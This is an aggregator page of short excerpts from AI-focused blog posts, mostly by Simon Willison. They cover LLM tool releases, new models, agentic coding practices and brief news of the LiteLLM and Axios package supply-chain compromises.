🔭AI Tools Scout

Leaderboard MCP Skills Content About

🔭AI Tools Scout·Data updated every 6 hours

Leaderboard MCP Skills Content About

AI Content Hub | AI Tools Scout

AI Content Hub

Curated tutorials, research, and news from 8 authors.

Content data last synced 5d ago. Expected every 6h.

Highlights from my conversation about agentic engineering on Lenny's Podcast

I was a guest on Lenny Rachitsky's podcast, in a new episode titled An AI state of the union: We've passed the inflection point, dark factories are coming, and automation timelines. It's available on YouTube, Spotify, and Apple Podcasts. Here are my highlights from our conversation, with relevant links. The November inflection point Software engineers as bellwethers for other information workers Writing code on my phone Responsible vibe coding Dark Factories and StrongDM The bot

Simon Willisonblog

Live blog: Code w/ Claude 2026

I'm at Anthropic's Code w/ Claude event today. Here's my live blog of the morning keynote sessions. Tags: ai, generative-ai, llms, anthropic, claude, claude-code, live-blog

Simon Willisonblog

llm-gemini 0.30

Release: llm-gemini 0.30 New models gemini-3.1-flash-lite-preview, gemma-4-26b-a4b-it and gemma-4-31b-it. See my notes on Gemma 4. Tags: gemini, llm, gemma

Simon Willisonblog

Gemma 4: Byte for byte, the most capable open models

Gemma 4: Byte for byte, the most capable open models Four new vision-capable Apache 2.0 licensed reasoning LLMs from Google DeepMind, sized at 2B, 4B, 31B, plus a 26B-A4B Mixture-of-Experts. Google emphasize "unprecedented level of intelligence-per-parameter", providing yet more evidence that creating small useful models is one of the hottest areas of research right now. They actually label the two smaller models as E2B and E4B for "Effective" parameter size. The system card explains: The small

Simon Willisonblog

Vibe coding and agentic engineering are getting closer than I'd like

I recently talked with Joseph Ruscio about AI coding tools for Heavybit's High Leverage podcast: Ep. #9, The AI Coding Paradigm Shift with Simon Willison. Here are some of my highlights, including my disturbing realization that vibe coding and agentic engineering have started to converge in my own work. One thing I really enjoy about podcasts is that they sometimes push me to think out loud in a way that exposes an idea I've not previously been able to put into words. Vibe coding and agentic eng

Simon Willisonblog

March 2026 sponsors-only newsletter

I just sent the March edition of my sponsors-only monthly newsletter. If you are a sponsor (or if you start a sponsorship now) you can access it here. In this month's newsletter: More agentic engineering patterns Streaming experts with MoE models on a Mac Model releases in March Vibe porting Supply chain attacks against PyPI and NPM Stuff I shipped What I'm using, March 2026 edition And a couple of museums Here's a copy of the February newsletter as a preview of what you'll get. Pay $10/month

Simon Willisonblog

datasette-referrer-policy 0.1

Release: datasette-referrer-policy 0.1 The OpenStreetMap tiles on the Datasette global-power-plants demo weren't displaying correctly. This turned out to be caused by two bugs. The first is that the CAPTCHA I added to that site a few weeks ago was triggering for the .json fetch requests used by the map plugin, and since those weren't HTML the user was not being asked to solve them. Here's the fix. The second was that OpenStreetMap quite reasonably block tile requests from sites that use

Simon Willisonblog

Our AI started a cafe in Stockholm

Our AI started a cafe in Stockholm Andon Labs previously started an AI-run retail store in San Francisco. Now they're running a similar experiment in Stockholm, Sweden, only this time it's a cafe. These experiments are interesting, and often throw out amusing anecdotes: During the first week of inventory, Mona ordered 120 eggs even though the café has no stove. When the staff told her they couldn’t cook them, she suggested using the high-speed oven, until they pointed out the eggs would likely

Simon Willisonblog

datasette-llm 0.1a6

Release: datasette-llm 0.1a6 The same model ID no longer needs to be repeated in both the default model and allowed models lists - setting it as a default model automatically adds it to the allowed models list. #6 Improved documentation for Python API usage. Tags: llm, datasette

Simon Willisonblog

datasette-enrichments-llm 0.2a1

Release: datasette-enrichments-llm 0.2a1 The actor who triggers an enrichment is now passed to the llm.mode(... actor=actor) method. #3 Tags: enrichments, llm, datasette

Simon Willisonblog

LiteLLM Hack: Were You One of the 47,000?

LiteLLM Hack: Were You One of the 47,000? Daniel Hnyk used the BigQuery PyPI dataset to determine how many downloads there were of the exploited LiteLLM packages during the 46 minute period they were live on PyPI. The answer was 46,996 across the two compromised release versions (1.82.7 and 1.82.8). They also identified 2,337 packages that depended on LiteLLM - 88% of which did not pin versions in a way that would have avoided the exploited version. Via @hnykda Tags: packaging, pypi,

Simon Willisonblog

datasette-llm 0.1a7

Release: datasette-llm 0.1a7 Mechanism for configuring default options for specific models. Part of Datasette's evolving support mechanism for plugins that use LLMs. It's now possible to configure a model with default options, e.g. to say all enrichment operations should use a specific model with temperature set to 0.5. Tags: llm, datasette

Simon Willisonblog

llm-echo 0.5a0

Release: llm-echo 0.5a0 New -o thinking 1 option to help test against LLM 0.32a0 and higher. This plugin provides a fake model called "echo" for LLM which doesn't run an LLM at all - it's useful for writing automated tests. You can now do this: uvx --with llm==0.32a1 --with llm-echo==0.5a0 llm -m echo hi -o thinking 1 This will fake a reasoning block to standard error before returning JSON echoing the prompt. Tags: llm

Simon Willisonblog

Auto mode for Claude Code

Auto mode for Claude Code Really interesting new development in Claude Code today as an alternative to --dangerously-skip-permissions: Today, we're introducing auto mode, a new permissions mode in Claude Code where Claude makes permission decisions on your behalf, with safeguards monitoring actions before they run. Those safeguards appear to be implemented using Claude Sonnet 4.6, as described in the documentation: Before each action runs, a separate classifier model reviews the conversation

Simon Willisonblog

Quoting John Gruber

So it’s well known that Y Combinator owns some stake in OpenAI. But how big is that stake? This seems like devilishly difficult information to obtain. I asked around and a little birdie who knows several OpenAI investors came back with an answer: Y Combinator owns about 0.6 percent of OpenAI. At OpenAI’s current $852 billion valuation, that’s worth over $5 billion. — John Gruber, Y Combinator’s Stake in OpenAI Tags: openai, y-combinator, ai, john-gruber

Simon Willisonblog

Granite 4.1 3B SVG Pelican Gallery

Granite 4.1 3B SVG Pelican Gallery IBM released their Granite 4.1 family of LLMs a few days ago. They're Apache 2.0 licensed and come in 3B, 8B and 30B sizes. Granite 4.1 LLMs: How They’re Built by Granite team member Yousaf Shah describes the training process in detail. Unsloth released the unsloth/granite-4.1-3b-GGUF collection of GGUF encoded quantized variants of the 3B model - 21 different model files ranging in size from 1.2GB to 6.34GB. All 21 of those Unsloth files add up to 51.3GB, whic

Simon Willisonblog

datasette-extract 0.3a0

Release: datasette-extract 0.3a0 Now uses datasette-llm to manage model configuration, which means you can control which models are available for extraction tasks using the extract purpose and LLM model configuration. #38 Tags: llm, datasette

Simon Willisonblog

datasette-enrichments-llm 0.2a0

Release: datasette-enrichments-llm 0.2a0 This plugin now uses datasette-llm to configure and manage models. This means it's possible to specify which models should be made available for enrichments, using the new enrichments purpose. Tags: llm, datasette

Simon Willisonblog

datasette-llm-usage 0.2a0

Release: datasette-llm-usage 0.2a0 Removed features relating to allowances and estimated pricing. These are now the domain of datasette-llm-accountant. Now depends on datasette-llm for model configuration. #3 Full prompts and responses and tool calls can now be logged to the llm_usage_prompt_log table in the internal database if you set the new datasette-llm-usage.log_prompts plugin configuration setting. Redesigned the /-/llm-usage-simple-prompt page, which now requires the llm-usage-simp

Simon Willisonblog

datasette-llm 0.1a5

Release: datasette-llm 0.1a5 The llm_prompt_context() plugin hook wrapper mechanism now tracks prompts executed within a chain as well as one-off prompts, which means it can be used to track tool call loops. #5 Tags: llm, datasette

Simon Willisonblog

Quoting Andy Masley

[...] Between 2000 and 2024, farmers sold in total a Colorado-sized chunk of land all on their own, 77 times all land on data center property in 2028, and grew more food than ever on what was left. None of this caused any problems for US food access. And then, in the middle of all this, a farmer in Loudoun County sells a few acres of mediocre hay field to a hyperscaler for ten times its agricultural value, and the response is that we’re running out of farmland. — Andy Masley, pushing back

Simon Willisonblog

April 2026 newsletter

I just sent out the April edition of my sponsors-only monthly newsletter. If you are a sponsor (or if you start a sponsorship now) you can access it here. In this month's newsletter: Opus 4.7 and GPT-5.5, both with price increases Claude Mythos and LLM security research ChatGPT Images 2.0 More model releases Other highlights from my blog What I'm using, April 2026 edition Here's a copy of the March newsletter as a preview of what you'll get. Pay $10/month to stay a month ahead of the free copy

Simon Willisonblog

Quoting Soohoon Choi

I want to argue that AI models will write good code because of economic incentives. Good code is cheaper to generate and maintain. Competition is high between the AI models right now, and the ones that win will help developers ship reliable features fastest, which requires simple, maintainable code. Good code will prevail, not only because we want it to (though we do!), but because economic forces demand it. Markets will not reward slop in coding, in the long-term. — Soohoon Choi, Slop Is

Simon Willisonblog

Package Managers Need to Cool Down

Package Managers Need to Cool Down Today's LiteLLM supply chain attack inspired me to revisit the idea of dependency cooldowns, the practice of only installing updated dependencies once they've been out in the wild for a few days to give the community a chance to spot if they've been subverted in some way. This recent piece (March 4th) piece by Andrew Nesbitt reviews the current state of dependency cooldown mechanisms across different packaging tools. It's surprisingly well supported! There's be

Simon Willisonblog

Quoting Christopher Mims

I really think "give AI total control of my computer and therefore my entire life" is going to look so foolish in retrospect that everyone who went for this is going to look as dumb as Jimmy Fallon holding up a picture of his Bored Ape — Christopher Mims, Technology columnist at The Wall Street Journal Tags: ai, security

Simon Willisonblog

Supply Chain Attack on Axios Pulls Malicious Dependency from npm

Supply Chain Attack on Axios Pulls Malicious Dependency from npm Useful writeup of today's supply chain attack against Axios, the HTTP client NPM package with 101 million weekly downloads. Versions 1.14.1 and 0.30.4 both included a new dependency called plain-crypto-js which was freshly published malware, stealing credentials and installing a remote access trojan (RAT). It looks like the attack came from a leaked long-lived npm token. Axios have an open issue to adopt trusted publishing, which w

Simon Willisonblog

TRE Python binding — ReDoS robustness demo

Research: TRE Python binding — ReDoS robustness demo If it's good enough for antirez to add to Redis I figured Ville Laurikari's TRE regular expression engine was worth exploring in a little more detail. I had Claude Code build an experimental Python binding (it used ctypes) and try some malicious regular expression attacks against the library. TRE handles those much better than Python's standard library implementation, thanks mainly to the lack of support for backtracking.

Simon Willisonblog

datasette-llm 0.1a4

Release: datasette-llm 0.1a4 Ability to configure different API keys for models based on their purpose - for example, set it up so enrichments always use gpt-5.4-mini with an API key dedicated to that purpose. #4 I released llm-echo 0.3 to provide an API key testing utility I needed for the tests for this new feature. Tags: llm, datasette

Simon Willisonblog

llm-all-models-async 0.1

Release: llm-all-models-async 0.1 LLM plugins can define new models in both sync and async varieties. The async variants are most common for API-backed models - sync variants tend to be things that run the model directly within the plugin. My llm-mrchatterbox plugin is sync only. I wanted to try it out with various Datasette LLM features (specifically datasette-enrichments-llm) but Datasette can only use async models. So... I had Claude spin up this plugin that turns sync models into async m

Simon Willisonblog

llm 0.30

Release: llm 0.30 The register_models() plugin hook now takes an optional model_aliases parameter listing all of the models, async models and aliases that have been registered so far by other plugins. A plugin with @hookimpl(trylast=True) can use this to take previously registered models into account. #1389 Added docstrings to public classes and methods and included those directly in the documentation. Tags: llm

Simon Willisonblog

Redis Array Playground

Tool: Redis Array Playground Salvatore Sanfilippo submitted a PR adding a new data type - arrays - to Redis. The new commands are ARCOUNT, ARDEL, ARDELRANGE, ARGET, ARGETRANGE, ARGREP, ARINFO, ARINSERT, ARLASTITEMS, ARLEN, ARMGET, ARMSET, ARNEXT, AROP, ARRING, ARSCAN, ARSEEK, ARSET. The implementation is currently available in a branch, so I had Claude Code for web build this interactive playground for trying out the new commands in a WASM-compiled build of a subset of Redis running in

Simon Willisonblog

Malicious litellm_init.pth in litellm 1.82.8 — credential stealer

Malicious litellm_init.pth in litellm 1.82.8 — credential stealer The LiteLLM v1.82.8 package published to PyPI was compromised with a particularly nasty credential stealer hidden in base64 in a litellm_init.pth file, which means installing the package is enough to trigger it even without running import litellm. (1.82.7 had the exploit as well but it was in the proxy/proxy_server.py file so the package had to be imported for it to take effect.) This issue has a very detailed description of what

Simon Willisonblog

llm-echo 0.4

Release: llm-echo 0.4 Prompts now have the input_tokens and output_tokens fields populated on the response. Tags: llm

Simon Willisonblog

llm-echo 0.3

Release: llm-echo 0.3 Mechanisms for testing tool calls. #3 Mechanism for testing raw responses. #4 New echo-needs-key model for testing model key logic. #7 Tags: llm

Simon Willisonblog

Streaming experts

I wrote about Dan Woods' experiments with streaming experts the other day, the trick where you run larger Mixture-of-Experts models on hardware that doesn't have enough RAM to fit the entire model by instead streaming the necessary expert weights from SSD for each token that you process. Five days ago Dan was running Qwen3.5-397B-A17B in 48GB of RAM. Today @seikixtc reported running the colossal Kimi K2.5 - a 1 trillion parameter model with 32B active weights at any one time, in 96GB of RAM on a

Simon Willisonblog

Quoting Neurotica

slop is something that takes more human effort to consume than it took to produce. When my coworker sends me raw Gemini output he’s not expressing his freedom to create, he’s disrespecting the value of my time — Neurotica, @schwarzgerat.bsky.social Tags: ai-ethics, slop, generative-ai, ai, llms

Simon Willisonblog

datasette-files 0.1a2

Release: datasette-files 0.1a2 The most interesting alpha of datasette-files yet, a new plugin which adds the ability to upload files directly into a Datasette instance. Here are the release notes in full: Columns are now configured using the new column_types system from Datasette 1.0a26. #8 New file_actions plugin hook, plus ability to import an uploaded CSV/TSV file to a table. #10 UI for uploading multiple files at once via the new documented JSON upload API. #11 Thumbnails are now gene

Simon Willisonblog

datasette-files 0.1a3

Release: datasette-files 0.1a3 I'm working on integrating datasette-files into other plugins, such as datasette-extract. This necessitated a new release of the base plugin. owners_can_edit and owners_can_delete configuration options, plus the files-edit and files-delete actions are now scoped to a new FileResource which is a child of FileSourceResource. #18 The file picker UI is now available as a <datasette-file-picker> Web Component. Thanks, Alex Garcia. #19 New from datasette_file

Simon Willisonblog

Quoting David Abram

I have been doing this for years, and the hardest parts of the job were never about typing out code. I have always struggled most with understanding systems, debugging things that made no sense, designing architectures that wouldn't collapse under heavy load, and making decisions that would save months of pain later. None of these problems can be solved LLMs. They can suggest code, help with boilerplate, sometimes can act as a sounding board. But they don't understand the system, they don't carr

Simon Willisonblog

Quoting Georgi Gerganov

Note that the main issues that people currently unknowingly face with local models mostly revolve around the harness and some intricacies around model chat templates and prompt construction. Sometimes there are even pure inference bugs. From typing the task in the client to the actual result, there is a long chain of components that atm are not only fragile - are also developed by different parties. So it's difficult to consolidate the entire stack and you have to keep in mind that what you are

Simon Willisonblog

datasette-llm 0.1a3

Release: datasette-llm 0.1a3 Adds the ability to configure which LLMs are available for which purpose, which means you can restrict the list of models that can be used with a specific plugin. #3 Tags: llm, datasette

Simon Willisonblog

Quoting Anthropic

We used an automatic classifier which judged sycophancy by looking at whether Claude showed a willingness to push back, maintain positions when challenged, give praise proportional to the merit of ideas, and speak frankly regardless of what a person wants to hear. Most of the time in these situations, Claude expressed no sycophancy—only 9% of conversations included sycophantic behavior (Figure 2). But two domains were exceptions: we saw sycophantic behavior in 38% of conversations focused on spi

Simon Willisonblog

Mr. Chatterbox is a (weak) Victorian-era ethically trained model you can run on your own computer

Trip Venturella released Mr. Chatterbox, a language model trained entirely on out-of-copyright text from the British Library. Here's how he describes it in the model card: Mr. Chatterbox is a language model trained entirely from scratch on a corpus of over 28,000 Victorian-era British texts published between 1837 and 1899, drawn from a dataset made available by the British Library. The model has absolutely no training inputs from after 1899 — the vocabulary and ideas are formed exclusively from

Simon Willisonblog

Beats now have notes

Last month I added a feature I call beats to this blog, pulling in some of my other content from external sources and including it on the homepage, search and various archive pages on the site. On any given day these frequently outnumber my regular posts. They were looking a little bit thin and were lacking any form of explanation beyond a link, so I've added the ability to annotate them with a "note" which now shows up as part of their display. Here's what that looks like for the content I publ

Simon Willisonblog

Starlette 1.0 skill

Research: Starlette 1.0 skill See Experimenting with Starlette 1.0 with Claude skills. Tags: starlette

Simon Willisonblog

Experimenting with Starlette 1.0 with Claude skills

Starlette 1.0 is out! This is a really big deal. I think Starlette may be the Python framework with the most usage compared to its relatively low brand recognition because Starlette is the foundation of FastAPI, which has attracted a huge amount of buzz that seems to have overshadowed Starlette itself. Kim Christie started working on Starlette in 2018 and it quickly became my favorite out of the new breed of Python ASGI frameworks. The only reason I didn't use it as the basis for my own Datasett

Simon Willisonblog

PCGamer Article Performance Audit

Research: PCGamer Article Performance Audit Stuart Breckenridge pointed out that PC Gamer Recommends RSS Readers in a 37MB Article That Just Keeps Downloading, highlighting a truly horrifying example of web bloat that added up to 100s more MBs thanks to auto-playing video ads. I decided to have Claude Code for web use Rodney to investigate the page - prompt here. Tags: web-performance, rodney

Simon Willisonblog

llm-mrchatterbox 0.1

Release: llm-mrchatterbox 0.1 See Mr. Chatterbox is a (weak) Victorian-era ethically trained model you can run on your own computer. Tags: llm

Simon Willisonblog

JavaScript Sandboxing Research

Research: JavaScript Sandboxing Research Aaron Harper wrote about Node.js worker threads, which inspired me to run a research task to see if they might help with running JavaScript in a sandbox. Claude Code went way beyond my initial question and produced a comparison of isolated-vm, vm2, quickjs-emscripten, QuickJS-NG, ShadowRealm, and Deno Workers. Tags: sandboxing, javascript, nodejs, claude-code

Simon Willisonblog

DNS Lookup

Tool: DNS Lookup TIL that Cloudflare's 1.1.1.1 DNS service (and 1.1.1.2 and 1.1.1.3, which block malware and malware + adult content respectively) has a CORS-enabled JSON API, so I had Claude Code build me a UI for running DNS queries against all three of those resolvers. Tags: dns, cors, cloudflare

Simon Willisonblog

Merge State Visualizer

Tool: Merge State Visualizer Bram Cohen wrote about his coherent vision for the future of version control using CRDTs, illustrated by 470 lines of Python. I fed that Python (minus comments) into Claude and asked for an explanation, then had it use Pyodide to build me an interactive UI for seeing how the algorithms work. Tags: vcs, pyodide, bram-cohen, crdt

Simon Willisonblog

Sightings

/elsewhere/sightings/ I have a new camera (a Canon R6 Mark II) so I'm taking a lot more photos of birds. I share my best wildlife photos on iNaturalist, and based on yesterday's successful prototype I decided to add those to my blog. I built this feature on my phone using Claude Code for web, as an extension of my beats system for syndicating external content. Here's the PR and prompt. As with my other forms of incoming syndicated content sightings show up on the homepage, the date archive pag

Simon Willisonblog

Pretext

Pretext Exciting new browser library from Cheng Lou, previously a React core developer and the original creator of the react-motion animation library. Pretext solves the problem of calculating the height of a paragraph of line-wrapped text without touching the DOM. The usual way of doing this is to render the text and measure its dimensions, but this is extremely expensive. Pretext uses an array of clever tricks to make this much, much faster, which enables all sorts of new text rendering effect

Simon Willisonblog

Pretext — Under the Hood

Tool: Pretext — Under the Hood See my notes on Pretext here.

Simon Willisonblog

Python Vulnerability Lookup

Tool: Python Vulnerability Lookup I learned that the OSV.dev open source vulnerability database has an open CORS JSON API, so I had Claude Code build this HTML tool for pasting in a pyproject.toml or requirements.txt file (or name of a GitHub repo containing those) and seeing a list of all reported vulnerabilities from that API. Tags: tools, python, supply-chain, vibe-coding, security

Simon Willisonblog

Profiling Hacker News users based on their comments

Here's a mildly dystopian prompt I've been experimenting with recently: "Profile this user", accompanied by a copy of their last 1,000 comments on Hacker News. Obtaining those comments is easy. The Algolia Hacker News API supports listing comments sorted by date that have a specific tag, and the author of a comment is tagged there as author_username. Here's a JSON feed of my (simonw) most recent comments, for example: https://hn.algolia.com/api/v1/search_by_date?tags=comment,author_simonw&hi

Simon Willisonblog

Using Git with coding agents

Agentic Engineering Patterns > Git is a key tool for working with coding agents. Keeping code in version control lets us record how that code changes over time and investigate and reverse any mistakes. All of the coding agents are fluent in using Git's features, both basic and advanced. This fluency means we can be more ambitious about how we use Git ourselves. We don't need to memorize how to do things with Git, but staying aware of what's possible means we can take advantage of the ful

Simon Willisonblog

iNaturalist Sightings

Tool: iNaturalist Sightings I wanted to see my iNaturalist observations - across two separate accounts - grouped by when they occurred. I'm camping this weekend so I built this entirely on my phone using Claude Code for web. I started by building an inaturalist-clumper Python CLI for fetching and "clumping" observations - by default clumps use observations within 2 hours and 5km of each other. Then I setup simonw/inaturalist-clumps as a Git scraping repository to run that tool and record

Simon Willisonblog

Quoting Matt Webb

The thing about agentic coding is that agents grind problems into dust. Give an agent a problem and a while loop and - long term - it’ll solve that problem even if it means burning a trillion tokens and re-writing down to the silicon. [...] But we want AI agents to solve coding problems quickly and in a way that is maintainable and adaptive and composable (benefiting from improvements elsewhere), and where every addition makes the whole stack better. So at the bottom is really great libraries th

Simon Willisonblog

Turbo Pascal 3.02A, deconstructed

Turbo Pascal 3.02A, deconstructed In Things That Turbo Pascal is Smaller Than James Hague lists things (from 2011) that are larger in size than Borland's 1985 Turbo Pascal 3.02 executable - a 39,731 byte file that somehow included a full text editor IDE and Pascal compiler. This inspired me to track down a copy of that executable (available as freeware since 2000) and see if Claude could interpret the binary and decompile it for me. It did a great job, so I had it create this interactive artifac

Simon Willisonblog

Codex CLI 0.128.0 adds /goal

Codex CLI 0.128.0 adds /goal The latest version of OpenAI's Codex CLI coding agent adds their own version of the Ralph loop: you can now set a /goal and Codex will keep on looping until it evaluates that the goal has been completed... or the configured token budget has been exhausted. It looks like the feature is mainly implemented though the goals/continuation.md and goals/budget_limit.md prompts, which are automatically injected at the end of a turn. Via @fcoury Tags: ai, openai, pr

Simon Willisonblog

Our evaluation of OpenAI's GPT-5.5 cyber capabilities

Our evaluation of OpenAI's GPT-5.5 cyber capabilities The UK's AI Security Institute previously evaluated Claude Mythos: now they've evaluated GPT-5.5 for finding security vulnerability and found it to be comparable to Mythos, but unlike Mythos it's generally available right now. Tags: ai, openai, generative-ai, llms, anthropic, claude, ai-security-research, gpt

Simon Willisonblog

Quoting Andrew Kelley

It's a common misconception that we can't tell who is using LLM and who is not. I'm sure we didn't catch 100% of LLM-assisted PRs over the past few months, but the kind of mistakes humans make are fundamentally different than LLM hallucinations, making them easy to spot. Furthermore, people who come from the world of agentic coding have a certain digital smell that is not obvious to them but is obvious to those who abstain. It's like when a smoker walks into the room, everybody who doesn't smoke

Simon Willisonblog

Quoting Kimi.ai @Kimi_Moonshot

Congrats to the @cursor_ai team on the launch of Composer 2! We are proud to see Kimi-k2.5 provide the foundation. Seeing our model integrated effectively through Cursor's continued pretraining & high-compute RL training is the open model ecosystem we love to support. Note: Cursor accesses Kimi-k2.5 via @FireworksAI_HQ hosted RL and inference platform as part of an authorized commercial partnership. — Kimi.ai @Kimi_Moonshot, responding to reports that Composer 2 was built on top of Kim

Simon Willisonblog

datasette-showboat 0.1a2

Release: datasette-showboat 0.1a2 I added an option to export a Markdown file from my app that lets Showboat incrementally publish updates to a remote server.

Simon Willisonblog

We need RSS for sharing abundant vibe-coded apps

We need RSS for sharing abundant vibe-coded apps Matt Webb: I would love an RSS web feed for all those various tools and apps pages, each item with an “Install” button. (But install to where?) The lesson here is that when vibe-coding accelerates app development, apps become more personal, more situated, and more frequent. Shipping a tool or a micro-app is less like launching a website and more like posting on a blog. This inspired me to have Claude add an Atom feed (and icon) to my /elsewhere/

Simon Willisonblog

Quoting Richard Fontana

FWIW, IANDBL, TINLA, etc., I don’t currently see any basis for concluding that chardet 7.0.0 is required to be released under the LGPL. AFAIK no one including Mark Pilgrim has identified persistence of copyrightable expressive material from earlier versions in 7.0.0 nor has anyone articulated some viable alternate theory of license violation. [...] — Richard Fontana, LGPLv3 co-author, weighing in on the chardet relicensing situation Tags: open-source, ai-ethics, llms, ai, generative-a

Simon Willisonblog

Vibe coding SwiftUI apps is a lot of fun

I have a new laptop - a 128GB M5 MacBook Pro, which early impressions show to be very capable for running good local LLMs. I got frustrated with Activity Monitor and decided to vibe code up some alternative tools for monitoring performance and I'm very happy with the results. This is my second experiment with vibe coding macOS apps - the first was this presentation app a few weeks ago. It turns out Claude Opus 4.6 and GPT-5.4 are both very competent at SwiftUI - and a full SwiftUI app can fit in

Simon Willisonblog

My minute-by-minute response to the LiteLLM malware attack

My minute-by-minute response to the LiteLLM malware attack Callum McMahon reported the LiteLLM malware attack to PyPI. Here he shares the Claude transcripts he used to help him confirm the vulnerability and decide what to do about it. Claude even suggested the PyPI security contact address after confirming the malicious code in a Docker container: Confirmed. Fresh download from PyPI right now in an isolated Docker container: Inspecting: litellm-1.82.8-py3-none-any.whl FOUND: litellm_init.pth SI

Simon Willisonblog

Thoughts on slowing the fuck down

Thoughts on slowing the fuck down Mario Zechner created the Pi agent framework used by OpenClaw, giving considerable credibility to his opinions on current trends in agentic engineering. He's not impressed: We have basically given up all discipline and agency for a sort of addiction, where your highest goal is to produce the largest amount of code in the shortest amount of time. Consequences be damned. Agents and humans both make mistakes, but agent mistakes accumulate much faster: A human is

Simon Willisonblog

datasette-llm 0.1a1

Release: datasette-llm 0.1a1 New release of the base plugin that makes models from LLM available for use by other Datasette plugins such as datasette-enrichments-llm. New register_llm_purposes() plugin hook and get_purposes() function for retrieving registered purpose strings. #1 One of the responsibilities of this plugin is to configure which models are used for which purposes, so you can say in one place "data enrichment uses GPT-5.4-nano but SQL query assistance happens using Sonnet 4

Simon Willisonblog

Quantization from the ground up

Quantization from the ground up Sam Rose continues his streak of publishing spectacularly informative interactive essays, this time explaining how quantization of Large Language Models works (which he says might be "the best post I've ever made".) Also included is the best visual explanation I've ever seen of how floating point numbers are represented using binary digits. I hadn't heard about outlier values in quantization - rare float values that exist outside of the normal tiny-value distribu

Simon Willisonblog

SQLite Tags Benchmark: Comparing 5 Tagging Strategies

Research: SQLite Tags Benchmark: Comparing 5 Tagging Strategies I had Claude Code run a micro-benchmark comparing different approaches to implementing tagging in SQLite. Traditional many-to-many tables won, but FTS5 came a close second. Full table scans with LIKE queries performed better than I expected, but full table scans with JSON arrays and json_each() were much slower. Tags: json, sqlite

Simon Willisonblog

[AINews] Gemma 4: The best small Multimodal Open Models, dramatically better than Gemma 3 in every way

A welcome update from Google!

Latent Space (swyx)blog

datasette-llm 0.1a2

Release: datasette-llm 0.1a2 actor is now available to the llm_prompt_context plugin hook. #2 Tags: llm, datasette

Simon Willisonblog

The Zig project's rationale for their firm anti-AI contribution policy

Zig has one of the most stringent anti-LLM policies of any major open source project: No LLMs for issues. No LLMs for pull requests. No LLMs for comments on the bug tracker, including translation. English is encouraged, but not required. You are welcome to post in your native language and rely on others to have their own translation tools of choice to interpret your words. The most prominent project written in Zig may be the Bun JavaScript runtime, which was acquired by Anthropic in December 2

Simon Willisonblog

llm 0.32a1

Release: llm 0.32a1 Fixed a bug in 0.32a0 where tool-calling conversations were not correctly reinflated from SQLite. #1426 Tags: llm

Simon Willisonblog

datasette-files-s3 0.1a1

Release: datasette-files-s3 0.1a1 A backend for datasette-files that adds the ability to store and retrieve files using an S3 bucket. This release added a mechanism for fetching S3 configuration periodically from a URL, which means we can use time limited IAM credentials that are restricted to a prefix within a bucket. Tags: s3, datasette

Simon Willisonblog

Coding agents for data analysis

Coding agents for data analysis Here's the handout I prepared for my NICAR 2026 workshop "Coding agents for data analysis" - a three hour session aimed at data journalists demonstrating ways that tools like Claude Code and OpenAI Codex can be used to explore, analyze and clean data. Here's the table of contents: Coding agents Warmup: ChatGPT and Claude Setup Claude Code and Codex Asking questions against a database Exploring data with agents Cleaning data: decoding neighborhood codes Creating

Simon Willisonblog

We Rewrote JSONata with AI in a Day, Saved $500K/Year

We Rewrote JSONata with AI in a Day, Saved $500K/Year Bit of a hyperbolic framing but this looks like another case study of vibe porting, this time spinning up a new custom Go implementation of the JSONata JSON expression language - similar in focus to jq, and heavily associated with the Node-RED platform. As with other vibe-porting projects the key enabling factor was JSONata's existing test suite, which helped build the first working Go version in 7 hours and $400 of token spend. The Reco team

Simon Willisonblog

LLM 0.32a0 is a major backwards-compatible refactor

I just released LLM 0.32a0, an alpha release of my LLM Python library and CLI tool for accessing LLMs, with some consequential changes that I've been working towards for quite a while. Previous versions of LLM modeled the world in terms of prompts and responses. Send the model a text prompt, get back a text response. import llm model = llm.get_model("gpt-5.5") response = model.prompt("Capital of France?") print(response.text()) This made sense when I started working on the library back in April

Simon Willisonblog

llm 0.32a0

Release: llm 0.32a0 See the annotated release notes. Tags: llm

Simon Willisonblog

Thoughts on OpenAI acquiring Astral and uv/ruff/ty

The big news this morning: Astral to join OpenAI (on the Astral blog) and OpenAI to acquire Astral (the OpenAI announcement). Astral are the company behind uv, ruff, and ty - three increasingly load-bearing open source projects in the Python ecosystem. I have thoughts! The official line from OpenAI and Astral The Astral team will become part of the Codex team at OpenAI. Charlie Marsh has this to say: Open source is at the heart of that impact and the heart of that story; it sits at the center o

Simon Willisonblog

vLLM V0 to V1: Correctness Before Corrections in RL

Hugging Face Blogblog

How coding agents work

Agentic Engineering Patterns > As with any tool, understanding how coding agents work under the hood can help you make better decisions about how to apply them. A coding agent is a piece of software that acts as a harness for an LLM, extending that LLM with additional capabilities that are powered by invisible prompts and implemented as callable tools. Large Language Models At the heart of any coding agent is a Large Language Model, or LLM. These have names like GPT-5.4 or Claude Opus 4.6

Simon Willisonblog

John M. Mossman Lock Collection

Museum: John M. Mossman Lock Collection The General Society of Mechanics and Tradesmen of the City of New York is home to the John M. Mossman Lock Collection, likely the world's largest collection of antique bank locks. Tags: museums

Simon Willisonblog

What is agentic engineering?

Agentic Engineering Patterns > I use the term agentic engineering to describe the practice of developing software with the assistance of coding agents. What are coding agents? They're agents that can both write and execute code. Popular examples include Claude Code, OpenAI Codex, and Gemini CLI. What's an agent? Clearly defining that term is a challenge that has frustrated AI researchers since at least the 1990s but the definition I've come to accept, at least in the field of Large Langua

Simon Willisonblog

Use subagents and custom agents in Codex

Use subagents and custom agents in Codex Subagents were announced in general availability today for OpenAI Codex, after several weeks of preview behind a feature flag. They're very similar to the Claude Code implementation, with default subagents for "explorer", "worker" and "default". It's unclear to me what the difference between "worker" and "default" is but based on their CSV example I think "worker" is intended for running large numbers of small tasks in parallel. Codex also lets you define

Simon Willisonblog

Quoting A member of Anthropic’s alignment-science team

The point of the blackmail exercise was to have something to describe to policymakers—results that are visceral enough to land with people, and make misalignment risk actually salient in practice for people who had never thought about it before. — A member of Anthropic’s alignment-science team, as told to Gideon Lewis-Kraus Tags: ai-ethics, anthropic, claude, generative-ai, ai, llms

Simon Willisonblog

Quoting Guilherme Rambo

Tidbit: the software-based camera indicator light in the MacBook Neo runs in the secure exclave¹ part of the chip, so it is almost as secure as the hardware indicator light. What that means in practice is that even a kernel-level exploit would not be able to turn on the camera without the light appearing on screen. It runs in a privileged environment separate from the kernel and blits the light directly onto the screen hardware. — Guilherme Rambo, in a text message to John Gruber Tags

Simon Willisonblog

Moonlake: Causal World Models should be Multimodal, Interactive, and Efficient — with Chris Manning and Fan-yun Sun

We cap out our World Models coverage with one of the most exciting new approaches - long running, multiplayer, interactive world models built with agents bootstrapped from game engines!

Latent Space (swyx)blog

